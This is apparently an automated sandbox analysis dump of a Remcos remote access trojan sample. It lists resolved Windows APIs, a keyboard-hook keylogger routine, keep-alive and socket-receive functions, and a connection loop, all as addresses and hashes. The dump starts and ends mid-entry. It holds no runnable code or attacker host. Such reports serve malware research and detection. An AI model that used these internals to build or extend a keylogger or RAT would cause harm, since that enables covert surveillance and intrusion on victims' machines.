API calls 47838->47905 47839->47216 47842 4043b6 47840->47842 47843 41a891 79 API calls 47842->47843 47844 4043bb 47843->47844 47844->47832 47909 41ab50 GlobalMemoryStatusEx 47845->47909 47847 41ab8d 47847->47216 47910 41371e 47848->47910 47852 40ccbc ___scrt_fastfail 47851->47852 47853 412735 3 API calls 47852->47853 47854 40ccf2 47853->47854 47855 403b40 28 API calls 47854->47855 47856 40cd03 47855->47856 47856->47216 47858 40cc0d 47857->47858 47859 412546 3 API calls 47858->47859 47861 40cc14 47859->47861 47860 40cc2c 47860->47216 47861->47860 47862 41258f 3 API calls 47861->47862 47862->47860 47863->47251 47865 436260 ___scrt_fastfail 47864->47865 47866 41ae7c GetForegroundWindow GetWindowTextW 47865->47866 47867 403b40 28 API calls 47866->47867 47868 41aea6 47867->47868 47868->47251 47870 401f66 28 API calls 47869->47870 47871 40e776 47870->47871 47871->47251 47872->47251 47876 4045ec 47873->47876 47874 43aa9c 

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D856), ref: 0041BF03
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF0C
                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D856), ref: 0041BF23
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF26
                                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D856), ref: 0041BF38
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF3B
                                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D856), ref: 0041BF4C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF4F
                                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D856), ref: 0041BF60
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF63
                                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D856), ref: 0041BF70
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF73
                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D856), ref: 0041BF80
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF83
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D856), ref: 0041BF90
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF93
                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D856), ref: 0041BFA4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BFA7
                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D856), ref: 0041BFB4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BFB7
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D856), ref: 0041BFC8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BFCB
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D856), ref: 0041BFDC
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BFDF
                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D856), ref: 0041BFF0
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BFF3
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D856), ref: 0041C000
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C003
                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D856), ref: 0041C011
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C014
                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D856), ref: 0041C021
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C024
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D856), ref: 0041C036
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C039
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D856), ref: 0041C046
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C049
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D856), ref: 0041C05B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C05E
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D856), ref: 0041C06B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C06E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$HandleLibraryLoadModule
                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                          • API String ID: 384173800-625181639
                                                          • Opcode ID: b0b2e61fc073e98d70dce9ef4f7eaaaad63808f39ef958059982ad015adeb2a9
                                                          • Instruction ID: 91c85bc0cfa8e625a7056272f5779649be84715ca0db9f9d819234a6a75bf275
                                                          • Opcode Fuzzy Hash: b0b2e61fc073e98d70dce9ef4f7eaaaad63808f39ef958059982ad015adeb2a9
                                                          • Instruction Fuzzy Hash: 4C31E2A0E8035C7ADB207BB69CC9F3B7E6DD9847953510427B54893190EB7DEC408EAE

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D856), ref: 0041BF03
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF0C
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D856), ref: 0041BF23
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF26
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D856), ref: 0041BF38
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF3B
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D856), ref: 0041BF4C
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF4F
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D856), ref: 0041BF60
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF63
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D856), ref: 0041BF70
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF73
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D856), ref: 0041BF80
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF83
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D856), ref: 0041BF90
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF93
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D856), ref: 0041BFA4
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFA7
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D856), ref: 0041BFB4
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFB7
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D856), ref: 0041BFC8
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFCB
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D856), ref: 0041BFDC
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFDF
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D856), ref: 0041BFF0
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFF3
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D856), ref: 0041C000
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041C003
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D856), ref: 0041C011
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe,00000104), ref: 0040D863
                                                            • Part of subcall function 0040FD92: __EH_prolog.LIBCMT ref: 0040FD97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                          • String ID: SG$0TG$Access Level: $Administrator$C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$Exe$Exe$Inj$PSG$PSG$Remcos Agent initialized$Rmc-JLQBNY$Software\$User$dMG$del$del$exepath$hSG$licence$license_code.txt
                                                          • API String ID: 2830904901-3689915391
                                                          • Opcode ID: 725633127e4b77860ee352cd58d9fd0f2a9b5a5623a9bf6990050f69c27e9e3b
                                                          • Instruction ID: b96e9d53b64ce9762df997b7c443b274fb73bccd3fe431706256fac2145036cf
                                                          • Opcode Fuzzy Hash: 725633127e4b77860ee352cd58d9fd0f2a9b5a5623a9bf6990050f69c27e9e3b
                                                          • Instruction Fuzzy Hash: 2E32C760B043406ADA14B776DC57BBE259A9F81748F00483FB9467B2E2DEBC9D44C39E

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                          • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                          • GetLastError.KERNEL32 ref: 00409A1B
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                          • TranslateMessage.USER32(?), ref: 00409A7A
                                                          • DispatchMessageA.USER32(?), ref: 00409A85
                                                          Strings
                                                          • Keylogger initialization failure: error , xrefs: 00409A32
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                          • String ID: Keylogger initialization failure: error
                                                          • API String ID: 3219506041-952744263
                                                          • Opcode ID: c6ad27a1f32c7b35bd706965db4ad972d695f79b56ef0d389dbfdbb6ef8f6fa1
                                                          • Instruction ID: 916e88852ed13b3ab14e3660f0b3d121b0d8821096f38c6baae7fa71b0b7a026
                                                          • Opcode Fuzzy Hash: c6ad27a1f32c7b35bd706965db4ad972d695f79b56ef0d389dbfdbb6ef8f6fa1
                                                          • Instruction Fuzzy Hash: 6D118271604301AFC710BB7A9C4996B77ECAB94B15B10057EFC45E2191EE34DA01CBAA

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0041258F: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004125AF
                                                            • Part of subcall function 0041258F: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475308), ref: 004125CD
                                                            • Part of subcall function 0041258F: RegCloseKey.KERNEL32(?), ref: 004125D8
                                                          • Sleep.KERNEL32(00000BB8), ref: 0040E6DB
                                                          • ExitProcess.KERNEL32 ref: 0040E74A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                          • String ID: 6.0.0 Pro$override$pth_unenc
                                                          • API String ID: 2281282204-4012039065
                                                          • Opcode ID: e48c5bd0e5f8f7b978d8bdbd670fe216713c81f394539d974a824bf7a4ef8053
                                                          • Instruction ID: 41eca1b412dc6cb4cbd69e66e1420b1d2a9bda06de9f36a729d5cd10817e4b5d
                                                          • Opcode Fuzzy Hash: e48c5bd0e5f8f7b978d8bdbd670fe216713c81f394539d974a824bf7a4ef8053
                                                          • Instruction Fuzzy Hash: A821D131F1420027D60876778857B6F399A9B81719F90052EF819A72E7EEBD9E1083DF

                                                          Control-flow Graph

                                                          control_flow_graph 1449 404915-404924 1450 4049b1 1449->1450 1451 40492a-404931 1449->1451 1452 4049b3-4049b7 1450->1452 1453 404933-404937 1451->1453 1454 404939-404940 1451->1454 1455 404987-4049af CreateEventA CreateThread 1453->1455 1454->1455 1456 404942-404982 GetLocalTime call 41af51 call 404c9e call 401f66 call 41a891 call 401eea 1454->1456 1455->1452 1456->1455
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000001,00474EE0,004755B0,00000000,?,?,?,?,?,00414F1C,?,00000001), ref: 00404946
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,004755B0,00000000,?,?,?,?,?,00414F1C,?,00000001), ref: 00404994
                                                          • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$EventLocalThreadTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 2532271599-1507639952
                                                          • Opcode ID: 3706b51fedfb6b17057c05fa2c189eb69b55955f33b2a26d59dd23dd1e9d912a
                                                          • Instruction ID: 334fa9fd2124ebc6c4f40b6d461b17bc354faf393a4ed588a06a33f3771f6744
                                                          • Opcode Fuzzy Hash: 3706b51fedfb6b17057c05fa2c189eb69b55955f33b2a26d59dd23dd1e9d912a
                                                          • Instruction Fuzzy Hash: 1611E3B19052547ACB10A7BA8849BDB7F9CAB86364F00007FF50462292DA789845CBFA
                                                          APIs
                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004328CD,00000024,?,?,?), ref: 00432B57
                                                          • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CDC9,?), ref: 00432B6D
                                                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CDC9,?), ref: 00432B7F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID:
                                                          • API String ID: 1815803762-0
                                                          • Opcode ID: 35a60dd61fd8b237ab80bed8c3b3b6d5f5cecafcaafe6d2ae27acd69f3d7963f
                                                          • Instruction ID: 69441ad90531868046e0b1178e1924530c202fcb63ed7aa5228c64bcbe668f15
                                                          • Opcode Fuzzy Hash: 35a60dd61fd8b237ab80bed8c3b3b6d5f5cecafcaafe6d2ae27acd69f3d7963f
                                                          • Instruction Fuzzy Hash: ADE09231608350FFFB300F25AC08F177B94EB89B65F21063AF155E40E4CAA59805961C
                                                          APIs
                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750FC), ref: 0041A9CA
                                                          • GetUserNameW.ADVAPI32(?,0040E096), ref: 0041A9E2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Name$ComputerUser
                                                          • String ID:
                                                          • API String ID: 4229901323-0
                                                          • Opcode ID: c38e36c8d41ee46761b6a4ad2d0e2b40601694a6c822a335d006f55048ef3fa5
                                                          • Instruction ID: dd4171341b6269d20eef4dfb17ad31a68228dcd82fcdc0eb213b330dd994abd5
                                                          • Opcode Fuzzy Hash: c38e36c8d41ee46761b6a4ad2d0e2b40601694a6c822a335d006f55048ef3fa5
                                                          • Instruction Fuzzy Hash: 16014F7290011CAADB00EB90DC49ADDBB7CEF44315F10016AB502B3195EFB4AB898A98
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004146BA,00474EE0,00475A38,00474EE0,00000000,00474EE0,?,00474EE0,6.0.0 Pro), ref: 0040E765
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: 4f63efff100e8568bd7427ee403b69b99ebb5287ae6166f5ca37386f2dc94b8d
                                                          • Instruction ID: 426317967f55bc2b8d076a22fb2a8dcf1c85f3a8f112093483d3870effb55d88
                                                          • Opcode Fuzzy Hash: 4f63efff100e8568bd7427ee403b69b99ebb5287ae6166f5ca37386f2dc94b8d
                                                          • Instruction Fuzzy Hash: A6D05E607002197BEA109691CC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF048AE1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID:
                                                          • API String ID: 1507349165-0
                                                          • Opcode ID: e479f6d312995adc38c95d140b7cef8bd4a3583c6482d3884fe68aabfa392038
                                                          • Instruction ID: 85cd51724732601f8c8003b199973b8832ebbe95acea7078dd2fcbbf2f3153fb
                                                          • Opcode Fuzzy Hash: e479f6d312995adc38c95d140b7cef8bd4a3583c6482d3884fe68aabfa392038
                                                          • Instruction Fuzzy Hash: FCB09279118202FFCA051B60CC0887ABEB6ABCC381F108D2DB986A01B0DE37C451AB26

                                                          Control-flow Graph

                                                          control_flow_graph 449 4140ac-4140f7 call 401faa call 41ac7e call 401faa call 401d64 call 401e8f call 43a7f7 462 414106-414154 call 401f66 call 401d64 call 401fbd call 41b1ce call 404262 call 401d64 call 40b125 449->462 463 4140f9-414100 Sleep 449->463 478 414156-4141c5 call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 462->478 479 4141c8-414262 call 401f66 call 401d64 call 401fbd call 41b1ce call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 462->479 463->462 478->479 532 414272-414279 479->532 533 414264-414270 479->533 534 41427e-41431a call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a891 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 414072 532->534 533->534 561 414367-414375 call 4041f1 534->561 562 41431c-414362 WSAGetLastError call 41be81 call 404c9e call 401f66 call 41a891 call 401eea 534->562 568 4143a2-4143b7 call 404915 call 40428c 561->568 569 414377-41439d call 401f66 * 2 call 41a891 561->569 584 414ce6-414cf8 call 4047eb call 4020b4 562->584 568->584 585 4143bd-41450a call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a891 call 401eea * 4 call 41ab78 call 41375b call 4082dc call 440e5e call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 412735 568->585 569->584 598 414d20-414d28 call 401d8c 584->598 599 414cfa-414d1a call 401d64 call 401e8f call 43a7f7 Sleep 584->599 649 41450c-414519 call 40541d 585->649 650 41451e-414545 call 401e8f call 4125eb 585->650 598->479 599->598 649->650 656 414547-414549 650->656 657 41454c-414975 call 403b40 call 41aff9 call 40cc9a call 41b0d3 call 40cbf1 call 41aff9 call 41b0d3 call 41af51 call 401d64 GetTickCount call 41af51 call 41aeab call 41af51 * 2 call 41ae5d call 41b0d3 * 5 call 40e751 call 41b0d3 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 4027cb call 40275c call 4027cb call 40275c 650->657 656->657 797 414977 call 404468 657->797 798 41497c-414c4d call 401eea * 54 call 401e13 call 401eea * 7 call 401e13 call 401eea call 401e13 call 4045d5 797->798 930 414c52-414c59 798->930 931 414c5b-414c62 930->931 932 414c6d-414c74 930->932 931->932 933 414c64-414c66 931->933 934 414c80-414cb2 call 405415 call 401f66 * 2 call 41a891 932->934 935 414c76-414c7b call 40a767 932->935 933->932 946 414cb4-414cc0 CreateThread 934->946 947 414cc6-414ce1 call 401eea * 2 call 401e13 934->947 935->934 946->947 947->584
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,00000029,00475308,?,00000000), ref: 00414100
                                                          • WSAGetLastError.WS2_32 ref: 00414321
                                                          • Sleep.KERNEL32(00000000,00000002), ref: 00414D1A
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
